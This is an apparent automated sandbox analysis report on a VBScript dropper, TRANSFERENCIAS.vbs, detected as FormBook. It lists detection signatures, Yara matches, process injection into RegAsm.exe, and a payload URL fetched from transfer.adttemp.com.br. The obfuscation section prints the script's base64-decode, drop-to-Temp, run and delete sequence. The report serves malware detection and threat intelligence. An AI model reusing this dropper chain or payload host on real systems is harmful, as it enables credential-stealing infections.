Windows Analysis Report
TRANSFERENCIAS.vbs

Overview

General Information

Sample name: TRANSFERENCIAS.vbs
Analysis ID: 1525551
MD5: 36785fe79d41b73fae95c26d6f64186d
SHA1: 9a2d9296673086220e25c622c059ba1a7b65dd89
SHA256: 434e6d3b448f48a98ef5dc955d51c05b8e136c40fda5f6b8cff698eab989ad07
Tags: vbs, user-abuse_ch

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
VBScript performs obfuscated calls to suspicious functions
Yara detected FormBook
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Potential malicious VBS script found (has network functionality)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Use Short Name Path in Command Line
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection

Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Avira: detection malicious, Label: TR/Dropper.Gen
Source: transfer.adttemp.com.br Virustotal: Detection: 5%
Source: http://transfer.adttemp.com.br Virustotal: Detection: 5%
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Submitted Sample Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Joe Sandbox ML: detected
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe Child: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Networking

Source: Initial file: stream.SaveToFile filePath, 2 ' Overwrite existing file
Source: global traffic HTTP traffic detected: GET /qbDh2/sirdeeeeee.txt HTTP/1.1 Host: transfer.adttemp.com.br Connection: Keep-Alive
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic DNS traffic detected: DNS query: transfer.adttemp.com.br
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.br
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BF3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://transfer.adttemp.com.brd
Source: temp_executable.exe, 00000008.00000002.1315543440.0000000002BE6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://transfer.adttemp.com.br
Source: wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe, 00000008.00000002.1315543440.0000000002BD5000.00000004.00000800.00020000.00000000.sdmp, temp_executable.exe.0.dr String found in binary or memory: https://transfer.adttemp.com.br/qbDh2/sirdeeeeee.txt
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown HTTPS traffic detected: 104.196.109.209:443 -> 192.168.2.7:49700 version: TLS 1.2

E-Banking Fraud

Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

System Summary

Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: C:\Windows\System32\wscript.exe COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_0042C563 NtClose, 10_2_0042C563
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F335C0 NtCreateMutant,LdrInitializeThunk, 10_2_02F335C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C70 NtFreeVirtualMemory,LdrInitializeThunk, 10_2_02F32C70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DF0 NtQuerySystemInformation,LdrInitializeThunk, 10_2_02F32DF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F34340 NtSetContextThread, 10_2_02F34340
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33090 NtSetValueKey, 10_2_02F33090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33010 NtOpenDirectoryObject, 10_2_02F33010
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F34650 NtSuspendThread, 10_2_02F34650
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AF0 NtWriteFile, 10_2_02F32AF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AD0 NtReadFile, 10_2_02F32AD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32AB0 NtWaitForSingleObject, 10_2_02F32AB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BF0 NtAllocateVirtualMemory, 10_2_02F32BF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BE0 NtQueryValueKey, 10_2_02F32BE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32BA0 NtEnumerateValueKey, 10_2_02F32BA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32B80 NtQueryInformationFile, 10_2_02F32B80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32B60 NtClose, 10_2_02F32B60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F339B0 NtGetContextThread, 10_2_02F339B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32EE0 NtQueueApcThread, 10_2_02F32EE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32EA0 NtAdjustPrivilegesToken, 10_2_02F32EA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32E80 NtReadVirtualMemory, 10_2_02F32E80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32E30 NtWriteVirtualMemory, 10_2_02F32E30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FE0 NtCreateFile, 10_2_02F32FE0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FB0 NtResumeThread, 10_2_02F32FB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32FA0 NtQuerySection, 10_2_02F32FA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F90 NtProtectVirtualMemory, 10_2_02F32F90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F60 NtCreateProcessEx, 10_2_02F32F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32F30 NtCreateSection, 10_2_02F32F30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CF0 NtOpenProcess, 10_2_02F32CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CC0 NtQueryVirtualMemory, 10_2_02F32CC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32CA0 NtQueryInformationToken, 10_2_02F32CA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C60 NtCreateKey, 10_2_02F32C60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32C00 NtQueryInformationProcess, 10_2_02F32C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DD0 NtDelayExecution, 10_2_02F32DD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32DB0 NtEnumerateKey, 10_2_02F32DB0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33D70 NtOpenThread, 10_2_02F33D70
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D30 NtUnmapViewOfSection, 10_2_02F32D30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D10 NtMapViewOfSection, 10_2_02F32D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F33D10 NtOpenProcessToken, 10_2_02F33D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F32D00 NtSetInformationFile, 10_2_02F32D00
Source: TRANSFERENCIAS.vbs Initial sample: Strings found which are bigger than 50
Source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: temp_executable.exe.0.dr, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.wscript.exe.2387f9940e0.1.raw.unpack, AesHelper.cs Cryptographic APIs: 'CreateDecryptor'
Source: 0.3.wscript.exe.2387e8ef4b0.0.raw.unpack, DyyVDbaRvM1YfIq9il.cs Cryptographic APIs: 'CreateDecryptor'
Source: classification engine Classification label: mal100.troj.expl.evad.winVBS@7/2@1/1
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Mutant created: NULL
Source: C:\Windows\System32\wscript.exe File created: C:\Users\user~1\AppData\Local\Temp\temp_executable.exe
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TRANSFERENCIAS.vbs"
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe"
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\wscript.exe Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msxml3.dll
Source: C:\Windows\System32\wscript.exe Section loaded: msdart.dll
Source: C:\Windows\System32\wscript.exe Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\wscript.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: Binary string: wntdll.pdbUGP source: RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: RegAsm.exe, RegAsm.exe, 0000000A.00000002.1842650381.0000000002EC0000.00000040.00001000.00020000.00000000.sdmp
Source: Binary string: MXCJKSD12.pdb source: wscript.exe, 00000000.00000002.1324624644.000002387ED7D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1326006406.000002387F970000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318550574.000002387ED7C000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318398769.000002387ED7E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273678507.000002387E8F0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273865229.000002387ED71000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318518516.000002387ED74000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1319390729.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318437273.000002387EA8A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1324207380.000002387EA8D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1273536026.000002387E8EF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1318568461.000002387EA8C000.00000004.00000020.00020000.00000000.sdmp, temp_executable.exe, 00000008.00000000.1276741849.00000000008D2000.00000002.00000001.01000000.00000006.sdmp, temp_executable.exe.0.dr

Data Obfuscation

Source: C:\Windows\System32\wscript.exe Anti Malware Scan Interface: .Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IDictionary.Add("@@", "A");IDictionary.Add("))", "T");IDictionary.Add(";;;", "V");IDictionary.Add("...", "B");IDictionary.Add("&&&", "J");IDictionary.Keys();IDictionary.Item("@@");IDictionary.Item("))");IDictionary.Item(";;;");IDictionary.Item("...");IDictionary.Item("&&&");IXMLDOMNode._00000029("base64");IXMLDOMElement.dataType("bin.base64");IXMLDOMElement.text("TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEEAEaw9OcAAAAAAAAAAOAALgELAQYAAMoAAAAKAAAAAAAALug");IXMLDOMElement.nodeTypedValue();IFileSystem3.GetSpecialFolder("2");IFolder.Path();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.SaveToFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "2");_Stream.Close();IWshShell3.Run("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe", "1", "true");IFileSystem3.FileExists("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe");IFileSystem3.DeleteFile("C:\Users\user~1\AppData\Local\Temp\temp_executable.exe")
Source: temp_executable.exe.0.dr, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
Source: 0.3.wscript.exe.2387ed7dca0.1.raw.unpack, DyyVDbaRvM1YfIq9il.cs .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777259)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777260)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.yc3yVO8lR6gu1(16777257))})
